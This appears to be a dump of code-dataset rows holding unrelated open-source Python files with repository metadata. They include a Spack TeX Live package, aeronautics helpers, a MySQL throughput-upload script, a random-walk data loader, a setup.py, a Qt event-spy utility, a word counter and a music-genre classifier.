Returns true if both objects are not equal
"""
return not self == other
|
apache-2.0
| -7,756,863,969,602,901,000
| 23.35
| 186
| 0.500257
| false
| 4.189247
| false
| false
| false
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/texlive/package.py
|
1
|
3446
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Texlive(Package):
"""TeX Live is a free software distribution for the TeX typesetting
system. Heads up, it's is not a reproducible installation."""
homepage = "http://www.tug.org/texlive"
# Install from specific site because the texlive mirrors do not
# all update in synchrony.
#
# BEWARE: TexLive updates their installs frequently (probably why
# they call it *Live*...). There is no good way to provide a
# repeatable install of the package.
#
# We're now pulling the installation bits from tug.org's repo of
# historic bits. This means that the checksum for the installer
# itself is stable. Don't let that fool you though, it's still
# installing TeX **LIVE** from e.g. ctan.math.... below, which is
# not reproducible.
version('live', '8f8fc301514c08a89a2e97197369c648',
url='ftp://tug.org/historic/systems/texlive/2017/install-tl-unx.tar.gz')
# There does not seem to be a complete list of schemes.
# Examples include:
# full scheme (everything)
# medium scheme (small + more packages and languages)
# small scheme (basic + xetex, metapost, a few languages)
# basic scheme (plain and latex)
# minimal scheme (plain only)
# See:
# https://www.tug.org/texlive/doc/texlive-en/texlive-en.html#x1-25025r6
variant(
'scheme',
default='small',
values=('minimal', 'basic', 'small', 'medium', 'full'),
description='Package subset to install'
)
depends_on('perl', type='build')
def install(self, spec, prefix):
# Using texlive's mirror system leads to mysterious problems,
# in lieu of being able to specify a repository as a variant, hardwire
# a particular (slow, but central) one for now.
_repository = 'http://ctan.math.washington.edu/tex-archive/systems/texlive/tlnet/'
env = os.environ
env['TEXLIVE_INSTALL_PREFIX'] = prefix
perl = which('perl')
scheme = spec.variants['scheme'].value
perl('./install-tl', '-scheme', scheme,
'-repository', _repository,
'-portable', '-profile', '/dev/null')
|
lgpl-2.1
| 428,417,736,615,517,630
| 42.620253
| 90
| 0.653511
| false
| 3.889391
| false
| false
| false
|
junzis/py-adsb-decoder
|
pyModeS/extra/aero.py
|
1
|
5201
|
"""
Functions for aeronautics in this module
- physical quantities always in SI units
- lat,lon,course and heading in degrees
International Standard Atmosphere
::
p,rho,T = atmos(H) # atmos as function of geopotential altitude H [m]
a = vsound(H) # speed of sound [m/s] as function of H[m]
p = pressure(H) # calls atmos but retruns only pressure [Pa]
T = temperature(H) # calculates temperature [K]
rho = density(H) # calls atmos but retruns only pressure [Pa]
Speed conversion at altitude H[m] in ISA
::
Mach = tas2mach(Vtas,H) # true airspeed (Vtas) to mach number conversion
Vtas = mach2tas(Mach,H) # true airspeed (Vtas) to mach number conversion
Vtas = eas2tas(Veas,H) # equivalent airspeed to true airspeed, H in [m]
Veas = tas2eas(Vtas,H) # true airspeed to equivent airspeed, H in [m]
Vtas = cas2tas(Vcas,H) # Vcas to Vtas conversion both m/s, H in [m]
Vcas = tas2cas(Vtas,H) # Vtas to Vcas conversion both m/s, H in [m]
Vcas = mach2cas(Mach,H) # Mach to Vcas conversion Vcas in m/s, H in [m]
Mach = cas2mach(Vcas,H) # Vcas to mach copnversion Vcas in m/s, H in [m]
"""
import numpy as np
"""Aero and geo Constants """
kts = 0.514444 # knot -> m/s
ft = 0.3048 # ft -> m
fpm = 0.00508 # ft/min -> m/s
inch = 0.0254 # inch -> m
sqft = 0.09290304 # 1 square foot
nm = 1852. # nautical mile -> m
lbs = 0.453592 # pound -> kg
g0 = 9.80665 # m/s2, Sea level gravity constant
R = 287.05287 # m2/(s2 x K), gas constant, sea level ISA
p0 = 101325. # Pa, air pressure, sea level ISA
rho0 = 1.225 # kg/m3, air density, sea level ISA
T0 = 288.15 # K, temperature, sea level ISA
gamma = 1.40 # cp/cv for air
gamma1 = 0.2 # (gamma-1)/2 for air
gamma2 = 3.5 # gamma/(gamma-1) for air
beta = -0.0065 # [K/m] ISA temp gradient below tropopause
r_earth = 6371000. # m, average earth radius
a0 = 340.293988 # m/s, sea level speed of sound ISA, sqrt(gamma*R*T0)
def atmos(H):
# H in metres
T = np.maximum(288.15 - 0.0065 * H, 216.65)
rhotrop = 1.225 * (T / 288.15)**4.256848030018761
dhstrat = np.maximum(0., H - 11000.0)
rho = rhotrop * np.exp(-dhstrat / 6341.552161)
p = rho * R * T
return p, rho, T
def temperature(H):
p, r, T = atmos(H)
return T
def pressure(H):
p, r, T = atmos(H)
return p
def density(H):
p, r, T = atmos(H)
return r
def vsound(H):
"""Speed of sound"""
T = temperature(H)
a = np.sqrt(gamma * R * T)
return a
def distance(lat1, lon1, lat2, lon2, H=0):
"""
Compute spherical distance from spherical coordinates.
For two locations in spherical coordinates
(1, theta, phi) and (1, theta', phi')
cosine( arc length ) =
sin phi sin phi' cos(theta-theta') + cos phi cos phi'
distance = rho * arc length
"""
# phi = 90 - latitude
phi1 = np.radians(90.0 - lat1)
phi2 = np.radians(90.0 - lat2)
# theta = longitude
theta1 = np.radians(lon1)
theta2 = np.radians(lon2)
cos = np.sin(phi1) * np.sin(phi2) * np.cos(theta1 - theta2) + np.cos(phi1) * np.cos(phi2)
cos = np.where(cos>1, 1, cos)
arc = np.arccos(cos)
dist = arc * (r_earth + H) # meters, radius of earth
return dist
def bearing(lat1, lon1, lat2, lon2):
lat1 = np.radians(lat1)
lon1 = np.radians(lon1)
lat2 = np.radians(lat2)
lon2 = np.radians(lon2)
x = np.sin(lon2-lon1) * np.cos(lat2)
y = np.cos(lat1) * np.sin(lat2) \
- np.sin(lat1) * np.cos(lat2) * np.cos(lon2-lon1)
initial_bearing = np.arctan2(x, y)
initial_bearing = np.degrees(initial_bearing)
bearing = (initial_bearing + 360) % 360
return bearing
# -----------------------------------------------------
# Speed conversions, altitude H all in meters
# -----------------------------------------------------
def tas2mach(Vtas, H):
"""True Airspeed to Mach number"""
a = vsound(H)
Mach = Vtas/a
return Mach
def mach2tas(Mach, H):
"""Mach number to True Airspeed"""
a = vsound(H)
Vtas = Mach*a
return Vtas
def eas2tas(Veas, H):
"""Equivalent Airspeed to True Airspeed"""
rho = density(H)
Vtas = Veas * np.sqrt(rho0/rho)
return Vtas
def tas2eas(Vtas, H):
"""True Airspeed to Equivalent Airspeed"""
rho = density(H)
Veas = Vtas * np.sqrt(rho/rho0)
return Veas
def cas2tas(Vcas, H):
"""Calibrated Airspeed to True Airspeed"""
p, rho, T = atmos(H)
qdyn = p0*((1.+rho0*Vcas*Vcas/(7.*p0))**3.5-1.)
Vtas = np.sqrt(7.*p/rho*((1.+qdyn/p)**(2./7.)-1.))
return Vtas
def tas2cas(Vtas, H):
"""True Airspeed to Calibrated Airspeed"""
p, rho, T = atmos(H)
qdyn = p*((1.+rho*Vtas*Vtas/(7.*p))**3.5-1.)
Vcas = np.sqrt(7.*p0/rho0*((qdyn/p0+1.)**(2./7.)-1.))
return Vcas
def mach2cas(Mach, H):
"""Mach number to Calibrated Airspeed"""
Vtas = mach2tas(Mach, H)
Vcas = tas2cas(Vtas, H)
return Vcas
def cas2mach(Vcas, H):
"""Calibrated Airspeed to Mach number"""
Vtas = cas2tas(Vcas, H)
Mach = tas2mach(Vtas, H)
return Mach
|
mit
| 6,628,668,726,650,856,000
| 27.266304
| 93
| 0.584503
| false
| 2.725891
| false
| false
| false
|
saltastro/saltefficiency
|
dataquality/upload_throughput.py
|
1
|
4898
|
import os
import argparse
import glob
import traceback
import mysql
import dataquality as dq
def upload_throughput(sdb, infile, force=False):
"""Upload throughput measurements to the Science Database
Parameters
----------
sdb: ~mysql.sdb
Connection to the Science Database
infile: str
Path to file to upload to the database
force: bool
If True, it will update the database even if an entry
already exists
"""
# parse the name of the file
tab_name, obsdate = dq.parse_filename(infile)
# check if it is already in the table
sel_cmd = "{}_Id, Throughput_Id".format(tab_name)
tab_cmd = "{} join Throughput using (Throughput_Id) join NightInfo using (NightInfo_id) ".format(tab_name)
log_cmd = " Date = '{}-{}-{}'".format(obsdate[0:4], obsdate[4:6], obsdate[6:8])
record = sdb.select(sel_cmd, tab_cmd, log_cmd)
if len(record) > 0 and not force: return
if os.path.basename(infile).startswith('Rss'):
instr='Rss'
elif os.path.basename(infile).startswith('Salticam'):
instr='Salticam'
else:
raise ValueError("File name not recognized")
# parse the file and update or insert into the database
lines = open(infile).readlines()
if len(lines) < 3 :
raise ValueError("Insufficient number of lines in {}".format(infile))
stars = lines[0].strip()
comment = lines[1].strip().strip('\'')
nid = sdb.select('NightInfo_Id', 'NightInfo', log_cmd)[0][0]
#create throughput
try:
tid = sdb.select('Throughput_Id','Throughput', 'NightInfo_Id={}'.format(nid))[0][0]
except:
ins_cmd = "NightInfo_Id = {} , StarsUsed = '{}', Comments = '{}'".format(nid, stars, comment)
sdb.insert(ins_cmd, 'Throughput')
tid = sdb.select('Throughput_Id','Throughput', 'NightInfo_Id={}'.format(nid))[0][0]
if force:
upd_cmd = "StarsUsed = '{}', Comments = '{}'".format(stars, comment)
sdb.update(upd_cmd, 'Throughput', 'Throughput_Id={}'.format(tid))
# upload each of the filters
for l in lines[2:]:
if not l.strip(): return
l = l.split()
if instr == 'Rss':
l[0] = l[0].strip(',')
try:
fid = sdb.select('RssFilter_Id', 'RssFilter', 'Barcode="{}"'.format(l[0]))[0][0]
except IndexError:
raise ValueError('{} is not an RSS Filter'.format(l[0]))
ins_cmd = 'RssFilter_Id={}, RssThroughputMeasurement={}'.format(fid, l[1])
up_cmd = 'RssFilter_Id={} and Throughput_Id={}'.format(fid, tid)
elif instr == 'Salticam':
l[0] = l[0].strip(',')
try:
fid = sdb.select('SalticamFilter_Id', 'SalticamFilter', 'SalticamFilter_Name="{}"'.format(l[0]))[0][0]
except IndexError:
raise ValueError('{} is not an Salticam Filter'.format(l[0]))
ins_cmd = '{}Filter_Id={}, Throughput_Id={}, {}={}'.format(instr, fid, tid, tab_name, l[1])
if len(record)==0:
sdb.insert(ins_cmd, tab_name)
elif force:
up_cmd = '{}Filter_Id={} and Throughput_Id={}'.format(instr, fid, tid)
uid = sdb.select('{}_Id'.format(tab_name), tab_name, up_cmd)[0][0]
sdb.update(ins_cmd, tab_name, '{}_Id={}'.format(tab_name, uid))
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Upload throughput measurents ot the SDB')
parser.add_argument('-dir', dest='throughput_dir', action='store',
default='/salt/logs/dataquality/throughput/',
help='Directory with throughput files')
parser.add_argument('-f', dest='force', action='store_const',
const=True, default=False,
help='Force the updates')
parser.add_argument('-e', dest='email', action='store_const',
const=True, default=False,
help='Email error results')
args = parser.parse_args()
user=os.environ['SDBUSER']
password=os.environ['SDBPASS']
sdb=mysql.mysql(sdbhost, sdbname, user, password, port=3306)
#get the file names
error_msg = ''
for infile in glob.glob(args.throughput_dir+'*.txt'):
try:
upload_throughput(sdb, infile, force=args.force)
except ValueError, e:
error_msg += infile + '\n' + traceback.format_exc() + str(e) + '\n\n'
except IOError, e:
error_msg += infile + '\n' + traceback.format_exc() + str(e) + '\n\n'
if error_msg: print(error_msg)
if email and error_msg:
mailuser = os.environ['MAILUSER']
mailpass = os.environ['MAILPASS']
dq.send_email(error_msg, 'UPLOAD_TRHOUGHPUT Error', username=mailuser,
password=mailpass, to=os.environ['TPUTLIST'], sender = os.environ['MAILSENDER'])
|
bsd-3-clause
| 3,220,284,524,995,481,600
| 37.265625
| 117
| 0.57942
| false
| 3.518678
| false
| false
| false
|
yashchandak/GNN
|
Sample_Run/Seq_Dynamic/blogDWdata.py
|
1
|
6976
|
from __future__ import generators, print_function
import numpy as np
from copy import deepcopy
from random import shuffle
from scipy.io import loadmat
class DataSet(object):
def __init__(self, cfg):
"""Construct a DataSet.
"""
self.cfg = cfg
self.all_walks, self.node_seq = self.get_walks(cfg.walks_dir)
#self.node_seq = self.all_walks[:, -1] # index by ending node
self.all_labels = self.get_labels(cfg.label_dir)
self.all_features= self.get_fetaures(cfg.features_dir)
#Increment the positions by 1 and mark the 0th one as False
self.train_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'train_ids.npy')))
self.val_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'val_ids.npy')))
self.test_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'test_ids.npy')))
# [!!!IMP!!]Assert no overlap between test/val/train nodes
self.label_cache, self.update_cache = {0:list(self.all_labels[0])}, {}
def get_walks(self, path):
walks = np.fliplr(np.loadtxt(path, dtype=np.int)) # reverse the sequence
seq = deepcopy(walks[:,-1])
#rotate around the sequences, such that ends are padded with zeros
for i in range(np.shape(walks)[0]):
non_zeros = np.sum(walks[i] > 0)
walks[i] = np.roll(walks[i], non_zeros)
return walks, seq
def get_fetaures(self, path):
# Serves 2 purpose:
# a) add feature for dummy node 0 a.k.a <EOS> and <unlabeled>
# b) increments index of all features by 1, thus aligning it with indices in walks
all_features = np.load(path)
all_features = all_features.astype(np.float32, copy=False) # Required conversion for Python3
all_features = np.concatenate(([np.zeros(all_features.shape[1])], all_features), 0)
return all_features
def get_labels(self, path):
# Labels start with node '0'; Walks_data with node '1'
# To get corresponding mapping, increment the label node number by 1
# add label for dummy node 0 a.k.a <EOS> and <unlabeled>
all_labels = np.load(path)
all_labels = np.concatenate(([np.zeros(all_labels.shape[1])], all_labels), 0)
return all_labels
def accumulate_label_cache(self, labels, nodes):
#Aggregates all the labels for the corresponding nodes
#and tracks the count of updates made
default = (self.all_labels[0], 0) #Initial estimate -> all_zeros
labels = labels[0]
if self.cfg.data_sets.binary_label_updates:
#Convert to binary and keep only the maximum value as 1
amax = np.argmax(labels, axis = 1)
labels = np.zeros(labels.shape)
for idx, pos in enumerate(amax):
labels[idx,pos] = 1
for idx, node in enumerate(nodes):
prv_label, prv_count = self.update_cache.get(node, default)
new_label = prv_label + labels[idx]
new_count = prv_count + 1
self.update_cache[node] = (new_label, new_count)
def update_label_cache(self):
#Average all the predictions made for the corresponding nodes and reset cache
for k, v in self.update_cache.items():
self.label_cache[k] = list(v[0]/v[1])
self.update_cache = {}
def get_nodes(self, dataset):
nodes = []
if dataset == 'train':
nodes = self.train_nodes
elif dataset == 'val':
nodes = self.val_nodes
elif dataset == 'test':
nodes = self.test_nodes
elif dataset == 'all':
# Get all the nodes except the 0th node
nodes = [True]*len(self.train_nodes)
nodes[0] = False
else:
raise ValueError
return nodes
def next_batch(self, dataset, batch_size, shuffle=True):
nodes = self.get_nodes(dataset)
label_len = np.shape(self.all_labels)[1]
max_len = self.all_walks.shape[1]
# Get position of all walks ending with desired set of nodes
pos = []
seq = []
for node in np.where(nodes)[0]:
temp = np.where(self.node_seq == node)[0]
pos.extend(temp)
seq.extend([node]*len(temp))
pos = np.array(pos)
seq = np.array(seq)
if shuffle:
indices = np.random.permutation(len(pos))
pos = pos[indices]
seq = seq[indices]
if batch_size == -1:
batch_size = len(pos)
tot = len(pos)//batch_size
for i in range(0, len(pos), batch_size):
x = self.all_walks[pos[i: i + batch_size]]
temp = np.array(x)>0 #get locations of all zero inputs
lengths = max_len - np.sum(temp, axis=1)
x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)
# get labels for valid data points, for others: select the 0th label
x2 = [[self.label_cache.get(item, self.label_cache[0]) for item in row] for row in x]
y = [list(self.all_labels[item]) for item in seq[i: i+batch_size]]
# get features for all data points
x = [[self.all_features[item] for item in row] for row in x]
#seq = self.node_seq[pos[i: i + batch_size]]
yield (x, x2, seq, y, tot, lengths)
def next_batch_same(self, dataset, node_count=1):
nodes = self.get_nodes(dataset)
pos = []
counts = []
seq = []
for node in np.where(nodes)[0]:
temp = np.where(self.node_seq == node)[0]
counts.append(len(temp))
seq.append(node)
pos.extend(temp)
pos = np.array(pos)
start = 0
max_len = self.all_walks.shape[1]
# Get a batch of all walks for 'node_count' number of node
for idx in range(0, len(counts), node_count):
#print(idx)
stop = start + np.sum(counts[idx:idx+node_count]) #start + total number of walks to be consiudered this time
x = self.all_walks[pos[start:stop]] #get the walks corresponding to respective positions
temp = np.array(x)>0 #get locations of all zero inputs
lengths = max_len - np.sum(temp, axis=1)
x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)
# get labels for valid data points, for others: select the 0th label
x2 = [[self.label_cache.get(item, self.label_cache[0]) for item in row] for row in x]
y = [list(self.all_labels[item]) for item in x[-1,:]] #Not useful, only presetn for sake of placeholder
# get features for all data points
x = [[self.all_features[item] for item in row] for row in x]
start = stop
yield (x, x2, seq[idx:idx+node_count], counts[idx:idx+node_count], y, lengths)
|
mit
| -3,829,700,722,819,435,500
| 38.862857
| 120
| 0.578842
| false
| 3.559184
| false
| false
| false
|
DOV-Vlaanderen/pydov
|
setup.py
|
1
|
2043
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import find_packages, setup
with open('README.md') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
with open('requirements.txt') as f:
requirements = f.read().splitlines()
with open('requirements_dev.txt') as f:
# ignore the general requirements
requirements_dev = f.read().splitlines()[1:]
with open('requirements_doc.txt') as f:
requirements_doc = f.read().splitlines()
with open('requirements_vectorfile.txt') as f:
requirements_vectorfile = f.read().splitlines()
setup(
name='pydov',
version='2.1.0',
description=("A Python package to download data from Databank Ondergrond "
"Vlaanderen (DOV)."),
long_description=readme,
long_description_content_type='text/markdown',
author="DOV-Vlaanderen",
author_email='dov@vlaanderen.be',
url='https://github.com/DOV-Vlaanderen/pydov',
packages=find_packages(
include=['pydov']),
include_package_data=True,
install_requires=requirements,
license="MIT license",
zip_safe=False,
keywords='pydov',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Natural Language :: Dutch',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Scientific/Engineering',
],
test_suite='tests',
tests_require=requirements_dev,
extras_require={
'docs': requirements_doc,
'devs': requirements_dev,
'vectorfile': requirements_vectorfile
}
)
|
mit
| 6,766,960,254,937,599,000
| 31.951613
| 78
| 0.619677
| false
| 3.847458
| false
| true
| false
|
ales-erjavec/orange-canvas
|
orangecanvas/scheme/tests/__init__.py
|
1
|
2700
|
"""
Scheme tests
"""
from AnyQt.QtCore import QObject, QEventLoop, QTimer, QCoreApplication, QEvent
from typing import List
class EventSpy(QObject):
"""
A testing utility class (similar to QSignalSpy) to record events
delivered to a QObject instance.
Note
----
Only event types can be recorded (as QEvent instances are deleted
on delivery).
Note
----
Can only be used with a QCoreApplication running.
Parameters
----------
object : QObject
An object whose events need to be recorded.
etype : Union[QEvent.Type, Sequence[QEvent.Type]
A event type (or types) that should be recorded
"""
def __init__(self, object: QObject, etype, **kwargs):
super().__init__(**kwargs)
if not isinstance(object, QObject):
raise TypeError
self.__object = object
try:
len(etype)
except TypeError:
etypes = {etype}
else:
etypes = set(etype)
self.__etypes = etypes
self.__record = []
self.__loop = QEventLoop()
self.__timer = QTimer(self, singleShot=True)
self.__timer.timeout.connect(self.__loop.quit)
self.__object.installEventFilter(self)
def wait(self, timeout=5000):
"""
Start an event loop that runs until a spied event or a timeout occurred.
Parameters
----------
timeout : int
Timeout in milliseconds.
Returns
-------
res : bool
True if the event occurred and False otherwise.
Example
-------
>>> app = QCoreApplication.instance() or QCoreApplication([])
>>> obj = QObject()
>>> spy = EventSpy(obj, QEvent.User)
>>> app.postEvent(obj, QEvent(QEvent.User))
>>> spy.wait()
True
>>> print(spy.events())
[1000]
"""
count = len(self.__record)
self.__timer.stop()
self.__timer.setInterval(timeout)
self.__timer.start()
self.__loop.exec_()
self.__timer.stop()
return len(self.__record) != count
def eventFilter(self, reciever: QObject, event: QEvent) -> bool:
if reciever is self.__object and event.type() in self.__etypes:
self.__record.append(event.type())
if self.__loop.isRunning():
self.__loop.quit()
return super().eventFilter(reciever, event)
def events(self) -> List[QEvent.Type]:
"""
Return a list of all (listened to) event types that occurred.
Returns
-------
events : List[QEvent.Type]
"""
return list(self.__record)
|
gpl-3.0
| 5,709,660,334,887,075,000
| 26.835052
| 80
| 0.554815
| false
| 4.292528
| false
| false
| false
|
AlexMathew/csipy-exercises
|
solution/words.py
|
1
|
1277
|
import sys
def setup(words):
new_words = []
for word in words:
new_words.append(word.lower())
words = new_words
# This could have been done easier with list comprehensions.
# words = [word.lower() for word in words]
wordset = set()
wordcount = dict()
for word in words:
prev_size = len(wordset)
wordset.add(word)
new_size = len(wordset)
if new_size > prev_size:
wordcount[word] = words.count(word)
return wordset, wordcount
def main():
if len(sys.argv) == 1 or len(sys.argv) > 2:
print 'FORMAT : python words.py --count|--set'
sys.exit(0)
# This could have been done by using exception handlers for IndexError.
option = sys.argv[1]
if option not in ['--count', '--set']:
print 'FORMAT : python words.py --count|--set'
sys.exit(0)
try:
with open('input.txt', 'r') as f:
text = f.read()
except Exception:
print 'Rename one of the two files there as input.txt'
words = text.split()
wordset, wordcount = setup(words)
if option == '--set':
content = " ".join(sorted(list(wordset)))
with open('output.txt', 'w') as f:
f.write(content)
elif option == '--count':
content = " ".join(sorted(wordcount, key=wordcount.get, reverse=True))
with open('output.txt', 'w') as f:
f.write(content)
if __name__ == '__main__':
main()
|
mit
| 7,769,703,426,424,290,000
| 26.782609
| 73
| 0.651527
| false
| 2.831486
| false
| false
| false
|
inf0-warri0r/music_cat
|
classifier/classifier.py
|
1
|
4355
|
#!/usr/bin/env python
"""
Author : tharindra galahena (inf0_warri0r)
Project: classifing music using neural network
Blog : http://www.inf0warri0r.blogspot.com
Date : 23/05/2013
License:
Copyright 2013 Tharindra Galahena
This is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version. This is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
* You should have received a copy of the GNU General Public License along with
this. If not, see http://www.gnu.org/licenses/.
"""
from PySide import QtCore, QtGui
from classify import Ui_classifier
import os
import sys
import file_read
import histograme
import thread
import neural_net
import plot
class MyWidget(QtGui.QMainWindow, Ui_classifier):
def __init__(self, parent=None):
super(MyWidget, self).__init__(parent)
self.setupUi(self)
self.file_name = ""
self.hist_u = list()
self.hist_n = list()
self.net = neural_net.neural(10, 1, 3, 15, 0.001, 0.0)
self.net.init()
self.net.put_weights(self.load())
self.img = ""
self.convert.clicked.connect(self.convert_file)
self.classify.clicked.connect(self.classify_func)
self.browse.clicked.connect(self.browse_func)
self.hist_lable.setScaledContents(True)
self.run = True
self.timer = QtCore.QTimer()
self.timer.setInterval(1000)
self.timer.timeout.connect(self.re_draw)
self.timer.start()
def browse_func(self):
fname, _ = QtGui.QFileDialog.getOpenFileName(self, 'Open file')
self.music_file.setText(str(fname))
def re_draw(self):
if not self.run:
QtGui.QMessageBox.about(self, "Done", "Done !!!")
self.run = True
return 0
def convert_file(self):
r, w = os.pipe()
self.file_name = self.music_file.text()
if self.file_name == "":
QtGui.QMessageBox.about(self, "ERROR", "invaild file")
return 0
pid = os.fork()
if pid:
os.waitpid(pid, 0)
else:
os.execlp("ffmpeg", "ffmpeg", "-i",
self.file_name, "-y", "out.aif")
exit(0)
try:
thread.start_new_thread(self.thread_func, ())
except Exception:
QtGui.QMessageBox.about(self, "ERROR", "thread error")
def thread_func(self):
self.run = True
f = file_read.file_read(("out.aif", "out.aif"))
f.convert()
f.save("./")
self.image = f.image
h = histograme.histograme(f.image)
h.create_histograme()
self.hist_u = h.unnormaliced_histograme()
self.hist_n = h.normalice_histograme()
print "done"
self.run = False
def classify_func(self):
p = plot.plot(self.hist_u, 600, 400, (256, 125, 0), (256, 256, 256))
p.set_scales()
p.set_plot()
p.draw("hist.jpg")
qimage = QtGui.QImage("out.aif.jpg")
pix = QtGui.QPixmap.fromImage(qimage)
self.label.setPixmap(pix)
qimage = QtGui.QImage("hist.jpg")
pix = QtGui.QPixmap.fromImage(qimage)
self.hist_lable.setPixmap(pix)
try:
thread.start_new_thread(self.thread_func2, ())
except Exception:
QtGui.QMessageBox.about(self, "ERROR", "thread error")
def thread_func2(self):
print self.hist_n
out = self.net.update(self.hist_n)
print out
self.gener.setText("")
if out[0] < 0.5:
self.type = "Rock"
else:
self.type = "Classic"
self.gener.setText(self.type)
def load(self):
f = open('weights', 'r')
cat = f.read()
f.close()
weights = list()
lst = cat.splitlines()
for i in range(0, len(lst)):
weights.append(float(lst[i]))
return weights
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = MyWidget()
window.show()
sys.exit(app.exec_())
|
agpl-3.0
| 809,784,179,446,759,300
| 27.279221
| 78
| 0.595867
| false
| 3.500804
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.